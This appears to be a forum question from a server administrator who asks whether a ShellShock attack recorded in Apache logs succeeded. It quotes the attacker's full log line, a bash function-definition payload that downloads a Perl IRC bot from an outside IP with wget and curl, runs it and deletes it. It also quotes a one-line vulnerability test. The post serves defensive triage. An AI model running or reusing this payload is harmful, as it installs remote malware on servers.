Looking through my web server logs, I noticed two different ShellShock attacks on my server, both of which generated a HTTP 200 OK response code. They look like this (IP address/date and time redacted):
223.252.35.159 - - [************] "GET / HTTP/1.1" 200 2203 "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \"" "() { :;}; /bin/bash -c \"echo [IP_ADDRESS]/ ;cd /var/tmp; wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den;cd /var/spool/samba/;wget 85.214.60.234/den;perl den;rm -fr den;curl -sO 85.214.60.234/den;perl den; echo \""
My bash version is 4.2.37 and we do regularly update this server through apt-get update && apt-get dist-upgrade
along with daily log file analysis. Apache 2.2.22 is being used and only port 80 is open. The file downloaded appears to be a IRC script which I can only imagine is used for flooding purposes in this context.
Trying to run x='() { :;}; echo VULNERABLE' bash -c :
(from Is there a short command to test if my server is secure against the shellshock bash bug?) returns nothing but running ps -p $$
from a SSH terminal shows a bash shell currently in use.
The question is that is it likely that the exploit worked given the above?